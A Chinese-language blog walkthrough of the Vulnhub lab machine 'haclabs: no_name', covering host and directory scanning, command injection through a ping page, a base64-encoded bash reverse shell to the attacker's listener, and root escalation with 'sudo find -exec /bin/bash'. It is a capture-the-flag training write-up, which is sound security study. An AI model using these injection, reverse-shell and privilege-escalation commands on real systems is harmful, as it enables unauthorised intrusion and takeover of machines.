Vulnhub靶机:HACLABS_ NO_NAME

最新推荐文章于 2023-01-12 12:24:48 发布
最新推荐文章于 2023-01-12 12:24:48 发布
阅读量3k 收藏 2
点赞数
分类专栏: 靶机 文章标签: Vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/122797751
版权

目录

介绍

系列: haclabs(此系列共3台)
发布日期:2020年2月15日
难度:初级-中级
Flag : 3个,每个Flag都存在与特定用户的家目录
学习:

  • 目录扫描
  • 命令执行
  • find提权

靶机地址:https://www.vulnhub.com/entry/haclabs-no_name,429/

信息收集

主机发现

netdiscover主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。

sudo netdiscover -i eth0 -r 192.168.124.0/24

在这里插入图片描述

主机信息探测

信息探测:nmap -A -p- 192.168.124.13,只开放了80端口
在这里插入图片描述

网站探测

访问80端口,就这德性。由于靶机没有开放22端口,大胆猜测应该是命令执行漏洞。
在这里插入图片描述

网站首页写着“假的管理员站点”,保守起见,还是先目录扫描一下,看看能不能找到真的管理员站点。

目录扫描

gobuster dir -u http://192.168.124.13/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100

在这里插入图片描述

在这里插入图片描述

普通的目录扫描,只发现了/admin,这个网站没啥用处,纯静态页面。换用大字典试试。可以用dirb或者gobuster调用此字典,个人感觉后者的性能会好一些
直接扫描,还是没扫出来新鲜的站点
在这里插入图片描述

gobuster dir -u http://192.168.124.13/ -w /usr/share/wordlists/dirb/big.txt -t 100 -x php

加上-x php,检查php扩展的列表,发现了/superadmin.php
在这里插入图片描述

网站页面如下,看到“ping”查询时,已经基本确定是命令执行漏洞了。
![image.png](https://img-blog.csdnimg.cn/img_convert/838460010b42dc1ca89a8ae06a0855aa.png#clientId=ud7f25632-9f15-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=157&id=u577f531c&margin=[object Object]&name=image.png&originHeight=196&originWidth=1614&originalType=binary&ratio=1&rotation=0&showTitle=false&size=41490&status=done&style=shadow&taskId=ucb6c1e5d-1845-42c3-af21-0d2403a27df&title=&width=1291.2)

命令执行

在这里插入图片描述

查看受限制的内容都是有哪些,使用命令:|cat superadmin.php
在这里插入图片描述

查看页面源代码
在这里插入图片描述

反弹shell

  1. kali准备
对反弹shell的命令做base64编码
echo "bash -i >& /dev/tcp/192.168.124.10/9090 0>&1" | base64

开启nc监听
nc -nvlp 9090
  1. 靶机准备
|echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC4xMC85MDkwIDA+JjEK"|base64 -d|bash

在这里插入图片描述

Flag2

在这里插入图片描述

Flag1

拿到Flag1的时候,得知用户yash把用户haclabs的密码在某个隐藏文件中
在这里插入图片描述

搜寻隐藏文件

根据Flag1的提示,搜索属于用户yash的所有文件:find / -type f -user yash 2>/dev/null
在这里插入图片描述

提权-Flag3

经典find提权,拿到Flag3:sudo -u root find . -exec /bin/bash \; -quit
在这里插入图片描述

参考

haclabs: no_name walkthrough Vulnhub CTF

lainwith
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
haclabs: no_name(HL.ova)靶机渗透-Vulnhub
m0_68117643的博客
07-16 1360
这台靶机(haclabsno_name)仅开放了1个80端口,目录扫描时尽可能使用多个工具和字典,以便尽可能多的收集信息。 突破点:目录扫描(注意字典和参数)——命令执行(注意payoad)—切换用户(注意优化终端)——find提权......
带妹玩转Vulnhub【四】
BadRer的博客
10-01 806
前言 今天我们请到了炫酷的女装大佬,和我一起为大家进行讲解,这次就不带妹子玩了,毕竟有女装大佬,真香!
Vulnhub靶机no_name渗透
xingjinhao123的博客
03-06 377
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/haclabs-no_name,429/ 靶机获取shell比较难,提权比较容易,一共有三个flag在用户的家目录里面,需要在virtualbox运行,网络设为桥接 运行环境 靶机:网络设为桥接,IP地址:192.168.1.91 攻击机:同网段下的kali linux,IP地址:192.168.1.37 开始渗透 运行靶机 获取靶机IP地址 扫描端口及其服务 看到只开放了一个80端口,扫一下目录 开始访问得到的目
Vulnhub靶机haclabs:deception1.1渗透
xingjinhao123的博客
09-05 690
靶机介绍 官方下载地址:https://www.vulnhub.com/entry/haclabs-deception11,440/ 靶机有三个flag,第一个flag是下载靶机镜像压缩包的密码,第二个flag在yash用户的家目录里面,第三个flag在root目录下 运行环境 靶机:网络设为桥接模式,IP地址:192.168.1.114 攻击机:同网段下的kali linux,IP地址:192.168.1.115 开始渗透 获取解压密码 将官网提示的字符串使用十六进制解码之后得到密码 将靶机运行起来
靶机测试haclabs-no_name
qq_56426046的博客
01-12 445
nmap 扫描gobuster 目录扫描分析 php 漏洞绕过命令执行漏洞反弹 SHELL搜索隐藏文件linux suid 提权linux sudo 提权人间忽晚,山河已秋。
Vulnhub靶机:BOREDHACKERBLOG_ CLOUD AV
LainWith的博客
06-18 1198
系列:BoredHackerBlog(此系列共4台) 发布日期:2020年03月29日 难度:初级-中级 靶机地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 内容简介: 这是本系列的第02次打靶,我选择了一个低难度级别的靶机。虽说难度级别为低,但是从还原整个渗透过程的角度来看,这个靶机非常全面。在这次打靶过程中,我们将使用到以下攻击手段:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtech
Vulnhub靶机:EVILBOX_ ONE(很详细)
LainWith的博客
07-08 2886
系列:EvilBox(此系列共1台) 发布日期:2021年08月16日 **难度等级:**低→中 **打靶目标:**取得 root 权限 + 2 Flag 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ 涉及攻击方法:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。 打开就是一个ubuntu站点,看不出什么东西,下一步自然是目录扫描了。 常规的dirsearch扫描完毕后,发现
Vulnhub靶机:TOMATO_ 1
LainWith的博客
08-29 965
系列Tomato(此系列共1台)发布日期:2020年09月14日注释:使用vmwar workstation运行虚拟机难度:低目标:取得 root 权限 + Flag主机发现端口扫描信息收集路径爬取文件包含写入日志内核漏洞枚举本地提权。...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
入坑 Hack The Box
热门推荐
LainWith的博客
10-19 1万+
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
pikachu靶机学习记录
LainWith的博客
08-11 8407
前言:网上关于pikachu的教程很多,这篇博文最大的意义就是对思路的梳理,这也是“靶机”专栏的一贯特点暴力破解基于表单的暴力破解验证码绕过(on client)验证码绕过(on server)token防爆破? 暴力破解 基于表单的暴力破解 首先随意输入一个用户名和密码,Burpsuite抓包 发现没有验证码及其他限制,可以肆意爆破,由于左上角的提示按钮给出了答案,下面处于演示需求做一个简单爆破。 爆出一个账密:admin:123456 验证码绕过(on client) 首先明确两个概念:验证码一
vulnhub之DC9靶机
LainWith的博客
02-15 3398
目录介绍信息收集主机发现主机信息探测访问网站爆破网站-失败漏扫网站sqlmap注入任意文件读取漏洞SSH爆破信息收集二次SSH爆破提权方式1提权方式2参考 介绍 系列: DC(此系列共10台) 发布日期:2019年12月29日 难度:中级 Flag:获取root权限并读取唯一的Flag 学习: bp联动xray扫描 sql注入 任意文件读取 ssh开门 提权 靶机地址:https://www.vulnhub.com/entry/dc-9,412/ 从靶场得到提示信息: 靶机更适用Virtualbox
Vulnhub靶机:HACKNOS:OS-HACKNOS-2.1
LainWith的博客
02-05 3145
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan漏扫网站测试POC破解用户密码SSH登录破解用户密码Flag1提权-Flag2参考 介绍 系列: hackNos(此系列共7台) 发布日期:2020 年 1 月 18 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: wordpress 安全测试 本地包含漏洞利用 john破解 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 信息收
vulnhub之DC8靶机
LainWith的博客
02-15 2919
目录介绍信息收集主机发现主机信息探测访问网站目录扫描漏洞发现手工SQL联合查询注入1. 判断列数,得知是1列2. 数据查询&信息收集(union select)3. 获取数据库的表名4. 查询指定表名下的列名信息5. 查询指定列获取数据6. 爆破密码反弹shell提权exim4提权拿到Flag 介绍 系列: DC(此系列共10台) 发布日期:2019年9月8日 难度:中级 Flag:此挑战的最终目标是绕过双因素身份验证,获取root权限并读取唯一的Flag 学习: sql注入 网站挂马 exim4
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值